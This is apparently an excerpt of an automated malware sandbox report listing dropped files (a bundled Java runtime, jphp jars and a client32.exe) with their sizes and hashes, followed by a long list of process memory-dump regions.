7ee3bde3b1777bf65d4f62ce33295556223a26cd

SHA256
434e57fffc7df0b725c1d95cabafdcdb83858ccb3e5e728a74d3cf33a0ca9c79

SHA512
1560703d0c162d73c99cef9e8ddc050362e45209cc8dea6a34a49e2b6f99aae462eae27ba026bdb29433952b6696896bb96998a0f6ac0a3c1dbbb2f6ebc26a7e

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zend-ext.jar

Filesize
95KB

MD5
4bc2aea7281e27bc91566377d0ed1897

SHA1
d02d897e8a8aca58e3635c009a16d595a5649d44

SHA256
4aef566bbf3f0b56769a0c45275ebbf7894e9ddb54430c9db2874124b7cea288

SHA512
da35bb2f67bca7527dc94e5a99a162180b2701ddca2c688d9e0be69876aca7c48f192d0f03d431ccd2d8eec55e0e681322b4f15eba4db29ef5557316e8e51e10

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zip-ext.jar

Filesize
12KB

MD5
20f6f88989e806d23c29686b090f6190

SHA1
1fdb9a66bb5ca587c05d3159829a8780bb66c87d

SHA256
9d5f06d539b91e98fd277fc01fd2f9af6fea58654e3b91098503b235a83abb16

SHA512
2798bb1dd0aa121cd766bd5b47d256b1a528e9db83ed61311fa685f669b7f60898118ae8c69d2a30d746af362b810b133103cbe426e0293dd2111aca1b41ccea

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\currency.data

Filesize
4KB

MD5
f6258230b51220609a60aa6ba70d68f3

SHA1
b5b95dd1ddcd3a433db14976e3b7f92664043536

SHA256
22458853da2415f7775652a7f57bb6665f83a9ae9fb8bd3cf05e29aac24c8441

SHA512
b2dfcfdebf9596f2bb05f021a24335f1eb2a094dca02b2d7dd1b7c871d5eecda7d50da7943b9f85edb5e92d9be6b6adfd24673ce816df3960e4d68c7f894563f

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\jfxrt.jar

Filesize
17.3MB

MD5
042b3675517d6a637b95014523b1fd7d

SHA1
82161caf5f0a4112686e4889a9e207c7ba62a880

SHA256
a570f20f8410f9b1b7e093957bf0ae53cae4731afaea624339aa2a897a635f22

SHA512
7672d0b50a92e854d3bd3724d01084cc10a90678b768e9a627baf761993e56a0c6c62c19155649fe9a8ceeabf845d86cbbb606554872ae789018a8b66e5a2b35

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\ext\meta-index

Filesize
1KB

MD5
77abe2551c7a5931b70f78962ac5a3c7

SHA1
a8bb53a505d7002def70c7a8788b9a2ea8a1d7bc

SHA256
c557f0c9053301703798e01dc0f65e290b0ae69075fb49fcc0e68c14b21d87f4

SHA512
9fe671380335804d4416e26c1e00cded200687db484f770ebbdb8631a9c769f0a449c661cb38f49c41463e822beb5248e69fd63562c3d8c508154c5d64421935

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\i386\jvm.cfg

Filesize
657B

MD5
9fd47c1a487b79a12e90e7506469477b

SHA1
7814df0ff2ea1827c75dcd73844ca7f025998cc6

SHA256
a73aea3074360cf62adedc0c82bc9c0c36c6a777c70da6c544d0fba7b2d8529e

SHA512
97b9d4c68ac4b534f86efa9af947763ee61aee6086581d96cbf7b3dbd6fd5d9db4b4d16772dce6f347b44085cef8a6ea3bfd3b84fbd9d4ef763cef39255fbce3

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\jsse.jar

Filesize
619KB

MD5
fd1434c81219c385f30b07e33cef9f30

SHA1
0b5ee897864c8605ef69f66dfe1e15729cfcbc59

SHA256
bc3a736e08e68ace28c68b0621dccfb76c1063bd28d7bd8fce7b20e7b7526cc5

SHA512
9a778a3843744f1fabad960aa22880d37c30b1cab29e123170d853c9469dc54a81e81a9070e1de1bf63ba527c332bb2b1f1d872907f3bdce33a6898a02fef22d

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\meta-index

Filesize
2KB

MD5
91aa6ea7320140f30379f758d626e59d

SHA1
3be2febe28723b1033ccdaa110eaf59bbd6d1f96

SHA256
4af21954cdf398d1eae795b6886ca2581dac9f2f1d41c98c6ed9b5dbc3e3c1d4

SHA512
03428803f1d644d89eb4c0dcbdea93acaac366d35fc1356ccabf83473f4fef7924edb771e44c721103cec22d94a179f092d1bfd1c0a62130f076eb82a826d7cb

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\resources.jar

Filesize
3.3MB

MD5
9a084b91667e7437574236cd27b7c688

SHA1
d8926cc4aa12d6fe9abe64c8c3cb8bc0f594c5b1

SHA256
a1366a75454fc0f1ca5a14ea03b4927bb8584d6d5b402dfa453122ae16dbf22d

SHA512
d603aa29e1f6eefff4b15c7ebc8a0fa18e090d2e1147d56fd80581c7404ee1cb9d6972fcf2bd0cb24926b3af4dfc5be9bce1fe018681f22a38adaa278bf22d73

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\security\java.security

Filesize
26KB

MD5
409c132fe4ea4abe9e5eb5a48a385b61

SHA1
446d68298be43eb657934552d656fa9ae240f2a2

SHA256
4d9e5a12b8cac8b36ecd88468b1c4018bc83c97eb467141901f90358d146a583

SHA512
7fed286ac9aed03e2dae24c3864edbbf812b65965c7173cc56ce622179eb5f872f77116275e96e1d52d1c58d3cdebe4e82b540b968e95d5da656aa74ad17400d

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzdb.dat

Filesize
101KB

MD5
5a7f416bd764e4a0c2deb976b1d04b7b

SHA1
e12754541a58d7687deda517cdda14b897ff4400

SHA256
a636afa5edba8aa0944836793537d9c5b5ca0091ccc3741fc0823edae8697c9d

SHA512
3ab2ad86832b98f8e5e1ce1c1b3ffefa3c3d00b592eb1858e4a10fff88d1a74da81ad24c7ec82615c398192f976a1c15358fce9451aa0af9e65fb566731d6d8f

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzmappings

Filesize
8KB

MD5
b8dd8953b143685b5e91abeb13ff24f0

SHA1
b5ceb39061fce39bb9d7a0176049a6e2600c419c

SHA256
3d49b3f2761c70f15057da48abe35a59b43d91fa4922be137c0022851b1ca272

SHA512
c9cd0eb1ba203c170f8196cbab1aaa067bcc86f2e52d0baf979aad370edf9f773e19f430777a5a1c66efe1ec3046f9bc82165acce3e3d1b8ae5879bd92f09c90

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\release

Filesize
533B

MD5
a61b1e3fe507d37f0d2f3add5ac691e0

SHA1
8ae1050ff466b8f024eed5bc067b87784f19a848

SHA256
f9e84b54cf0d8cb0645e0d89bf47ed74c88af98ac5bf9ccf3accb1a824f7dc3a

SHA512
3e88a839e44241ae642d0f9b7000d80be7cf4bd003a9e2f9f04a4feb61ec4877b2b4e76151503184f4b9978894ba1d0de034dbc5f2e51c31b3abb24f0eacf0c7

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-api.jar

Filesize
40KB

MD5
caafe376afb7086dcbee79f780394ca3

SHA1
da76ca59f6a57ee3102f8f9bd9cee742973efa8a

SHA256
18c4a0095d5c1da6b817592e767bb23d29dd2f560ad74df75ff3961dbde25b79

SHA512
5dd6271fd5b34579d8e66271bab75c89baca8b2ebeaa9966de391284bd08f2d720083c6e0e1edda106ecf8a04e9a32116de6873f0f88c19c049c0fe27e5d820b

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-simple.jar

Filesize
14KB

MD5
722bb90689aecc523e3fe317e1f0984b

SHA1
8dacf9514f0c707cbbcdd6fd699e8940d42fb54e

SHA256
0966e86fffa5be52d3d9e7b89dd674d98a03eed0a454fbaf7c1bd9493bd9d874

SHA512
d5effbfa105bcd615e56ef983075c9ef0f52bcfdbefa3ce8cea9550f25b859e48b32f2ec9aa7a305c6611a3be5e0cde0d269588d9c2897ca987359b77213331d

Download Submit
C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\zt-zip.jar

Filesize
102KB

MD5
0fd8bc4f0f2e37feb1efc474d037af55

SHA1
add8fface4c1936787eb4bffe4ea944a13467d53

SHA256
1e31ef3145d1e30b31107b7afc4a61011ebca99550dce65f945c2ea4ccac714b

SHA512
29de5832db5b43fdc99bb7ea32a7359441d6cf5c05561dd0a6960b33078471e4740ee08ffbd97a5ced4b7dd9cc98fad6add43edb4418bf719f90f83c58188149

Download Submit
C:\Users\Admin\AppData\Roaming\TempControll\client32.exe

Filesize
33KB

MD5
290c26b1579fd3e48d60181a2d22a287

SHA1
e4c91a7f161783c68cf67250206047f23bd25a29

SHA256
973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128

SHA512
114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a

Download Submit
memory/208-552-0x00007FFE4D590000-0x00007FFE4D845000-memory.dmp

Filesize
2.7MB

Download
memory/208-550-0x00007FF7CB720000-0x00007FF7CB818000-memory.dmp

Filesize
992KB

Download
memory/208-551-0x00007FFE581F0000-0x00007FFE58224000-memory.dmp

Filesize
208KB

Download
memory/208-527-0x00007FFE4D410000-0x00007FFE4D582000-memory.dmp

Filesize
1.4MB

Download
memory/684-220-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/3320-650-0x00007FFE53800000-0x00007FFE53834000-memory.dmp

Filesize
208KB

Download
memory/3320-647-0x00007FFE4D6D0000-0x00007FFE4D842000-memory.dmp

Filesize
1.4MB

Download
memory/3320-553-0x00007FFE4D6D0000-0x00007FFE4D842000-memory.dmp

Filesize
1.4MB

Download
memory/3616-302-0x0000000002298000-0x00000000022A0000-memory.dmp

Filesize
32KB

Download
memory/3616-429-0x00000000023F8000-0x0000000002400000-memory.dmp

Filesize
32KB

Download
memory/3616-329-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/3616-334-0x0000000002368000-0x0000000002370000-memory.dmp

Filesize
32KB

Download
memory/3616-333-0x0000000002318000-0x0000000002320000-memory.dmp

Filesize
32KB

Download
memory/3616-315-0x0000000002308000-0x0000000002310000-memory.dmp

Filesize
32KB

Download
memory/3616-316-0x0000000002358000-0x0000000002360000-memory.dmp

Filesize
32KB

Download
memory/3616-310-0x0000000002350000-0x0000000002358000-memory.dmp

Filesize
32KB

Download
memory/3616-307-0x0000000002348000-0x0000000002350000-memory.dmp

Filesize
32KB

Download
memory/3616-347-0x0000000002370000-0x0000000002378000-memory.dmp

Filesize
32KB

Download
memory/3616-346-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/3616-351-0x0000000002378000-0x0000000002380000-memory.dmp

Filesize
32KB

Download
memory/3616-350-0x0000000002328000-0x0000000002330000-memory.dmp

Filesize
32KB

Download
memory/3616-301-0x0000000002300000-0x0000000002308000-memory.dmp

Filesize
32KB

Download
memory/3616-303-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/3616-357-0x0000000002380000-0x0000000002388000-memory.dmp

Filesize
32KB

Download
memory/3616-356-0x0000000002330000-0x0000000002338000-memory.dmp

Filesize
32KB

Download
memory/3616-297-0x00000000022B0000-0x00000000022B8000-memory.dmp

Filesize
32KB

Download
memory/3616-362-0x0000000002388000-0x0000000002390000-memory.dmp

Filesize
32KB

Download
memory/3616-361-0x0000000002338000-0x0000000002340000-memory.dmp

Filesize
32KB

Download
memory/3616-366-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/3616-365-0x0000000002340000-0x0000000002348000-memory.dmp

Filesize
32KB

Download
memory/3616-369-0x0000000002348000-0x0000000002350000-memory.dmp

Filesize
32KB

Download
memory/3616-370-0x0000000002398000-0x00000000023A0000-memory.dmp

Filesize
32KB

Download
memory/3616-298-0x0000000002338000-0x0000000002340000-memory.dmp

Filesize
32KB

Download
memory/3616-293-0x00000000022A8000-0x00000000022B0000-memory.dmp

Filesize
32KB

Download
memory/3616-377-0x00000000023A0000-0x00000000023A8000-memory.dmp

Filesize
32KB

Download
memory/3616-376-0x0000000002350000-0x0000000002358000-memory.dmp

Filesize
32KB

Download
memory/3616-379-0x0000000002358000-0x0000000002360000-memory.dmp

Filesize
32KB

Download
memory/3616-380-0x00000000023A8000-0x00000000023B0000-memory.dmp

Filesize
32KB

Download
memory/3616-294-0x0000000002330000-0x0000000002338000-memory.dmp

Filesize
32KB

Download
memory/3616-291-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-390-0x0000000002360000-0x0000000002368000-memory.dmp

Filesize
32KB

Download
memory/3616-391-0x00000000023B0000-0x00000000023B8000-memory.dmp

Filesize
32KB

Download
memory/3616-392-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-398-0x00000000023B8000-0x00000000023C0000-memory.dmp

Filesize
32KB

Download
memory/3616-397-0x0000000002368000-0x0000000002370000-memory.dmp

Filesize
32KB

Download
memory/3616-399-0x0000000002370000-0x0000000002378000-memory.dmp

Filesize
32KB

Download
memory/3616-400-0x00000000023C0000-0x00000000023C8000-memory.dmp

Filesize
32KB

Download
memory/3616-404-0x00000000023C8000-0x00000000023D0000-memory.dmp

Filesize
32KB

Download
memory/3616-403-0x0000000002378000-0x0000000002380000-memory.dmp

Filesize
32KB

Download
memory/3616-289-0x0000000002260000-0x0000000002288000-memory.dmp

Filesize
160KB

Download
memory/3616-290-0x0000000002328000-0x0000000002330000-memory.dmp

Filesize
32KB

Download
memory/3616-412-0x00000000023D0000-0x00000000023D8000-memory.dmp

Filesize
32KB

Download
memory/3616-411-0x0000000002380000-0x0000000002388000-memory.dmp

Filesize
32KB

Download
memory/3616-416-0x00000000023D8000-0x00000000023E0000-memory.dmp

Filesize
32KB

Download
memory/3616-415-0x0000000002388000-0x0000000002390000-memory.dmp

Filesize
32KB

Download
memory/3616-418-0x00000000023E0000-0x00000000023E8000-memory.dmp

Filesize
32KB

Download
memory/3616-417-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/3616-419-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-423-0x00000000023E8000-0x00000000023F0000-memory.dmp

Filesize
32KB

Download
memory/3616-422-0x0000000002398000-0x00000000023A0000-memory.dmp

Filesize
32KB

Download
memory/3616-425-0x00000000023F0000-0x00000000023F8000-memory.dmp

Filesize
32KB

Download
memory/3616-424-0x00000000023A0000-0x00000000023A8000-memory.dmp

Filesize
32KB

Download
memory/3616-428-0x00000000023A8000-0x00000000023B0000-memory.dmp

Filesize
32KB

Download
memory/3616-330-0x0000000002360000-0x0000000002368000-memory.dmp

Filesize
32KB

Download
memory/3616-432-0x0000000002400000-0x0000000002408000-memory.dmp

Filesize
32KB

Download
memory/3616-431-0x00000000023B0000-0x00000000023B8000-memory.dmp

Filesize
32KB

Download
memory/3616-434-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-436-0x0000000002408000-0x0000000002410000-memory.dmp

Filesize
32KB

Download
memory/3616-435-0x00000000023B8000-0x00000000023C0000-memory.dmp

Filesize
32KB

Download
memory/3616-439-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/3616-438-0x00000000023C0000-0x00000000023C8000-memory.dmp

Filesize
32KB

Download
memory/3616-440-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-444-0x0000000002418000-0x0000000002420000-memory.dmp

Filesize
32KB

Download
memory/3616-443-0x00000000023C8000-0x00000000023D0000-memory.dmp

Filesize
32KB

Download
memory/3616-449-0x0000000002420000-0x0000000002428000-memory.dmp

Filesize
32KB

Download
memory/3616-448-0x00000000023D0000-0x00000000023D8000-memory.dmp

Filesize
32KB

Download
memory/3616-454-0x0000000002428000-0x0000000002430000-memory.dmp

Filesize
32KB

Download
memory/3616-453-0x00000000023D8000-0x00000000023E0000-memory.dmp

Filesize
32KB

Download
memory/3616-457-0x0000000002430000-0x0000000002438000-memory.dmp

Filesize
32KB

Download
memory/3616-456-0x00000000023E0000-0x00000000023E8000-memory.dmp

Filesize
32KB

Download
memory/3616-460-0x0000000002438000-0x0000000002440000-memory.dmp

Filesize
32KB

Download
memory/3616-459-0x00000000023E8000-0x00000000023F0000-memory.dmp

Filesize
32KB

Download
memory/3616-463-0x0000000002440000-0x0000000002448000-memory.dmp

Filesize
32KB

Download
memory/3616-462-0x00000000023F0000-0x00000000023F8000-memory.dmp

Filesize
32KB

Download
memory/3616-467-0x0000000002448000-0x0000000002450000-memory.dmp

Filesize
32KB

Download
memory/3616-466-0x00000000023F8000-0x0000000002400000-memory.dmp

Filesize
32KB

Download
memory/3616-470-0x0000000002450000-0x0000000002458000-memory.dmp

Filesize
32KB

Download
memory/3616-469-0x0000000002400000-0x0000000002408000-memory.dmp

Filesize
32KB

Download
memory/3616-473-0x0000000002458000-0x0000000002460000-memory.dmp

Filesize
32KB

Download
memory/3616-472-0x0000000002408000-0x0000000002410000-memory.dmp

Filesize
32KB

Download
memory/3616-476-0x0000000002460000-0x0000000002468000-memory.dmp

Filesize
32KB

Download
memory/3616-475-0x0000000002410000-0x0000000002418000-memory.dmp

Filesize
32KB

Download
memory/3616-480-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-483-0x0000000002418000-0x0000000002420000-memory.dmp

Filesize
32KB

Download
memory/3616-484-0x0000000002420000-0x0000000002428000-memory.dmp

Filesize
32KB

Download
memory/3616-486-0x0000000002428000-0x0000000002430000-memory.dmp

Filesize
32KB

Download
memory/3616-487-0x0000000002430000-0x0000000002438000-memory.dmp

Filesize
32KB

Download
memory/3616-490-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-491-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-498-0x0000000002438000-0x0000000002440000-memory.dmp

Filesize
32KB

Download
memory/3616-500-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-501-0x0000000002440000-0x0000000002448000-memory.dmp

Filesize
32KB

Download
memory/3616-526-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-288-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-286-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download
memory/3616-284-0x0000000002318000-0x0000000002320000-memory.dmp

Filesize
32KB

Download
memory/3616-282-0x0000000002310000-0x0000000002318000-memory.dmp

Filesize
32KB

Download
memory/3616-277-0x0000000002308000-0x0000000002310000-memory.dmp

Filesize
32KB

Download
memory/3616-262-0x0000000002300000-0x0000000002308000-memory.dmp

Filesize
32KB

Download
memory/3616-556-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-557-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-560-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-561-0x0000000000780000-0x0000000000781000-memory.dmp

Filesize
4KB

Download
memory/3616-263-0x00000000022A0000-0x00000000022A8000-memory.dmp

Filesize
32KB

Download
memory/3616-266-0x00000000022F8000-0x0000000002300000-memory.dmp

Filesize
32KB

Download
memory/3616-265-0x0000000002298000-0x00000000022A0000-memory.dmp

Filesize
32KB

Download
memory/3616-247-0x00000000022B0000-0x00000000022B8000-memory.dmp

Filesize
32KB

Download
memory/3616-245-0x00000000022A8000-0x00000000022B0000-memory.dmp

Filesize
32KB

Download
memory/3616-239-0x0000000002260000-0x0000000002288000-memory.dmp

Filesize
160KB

Download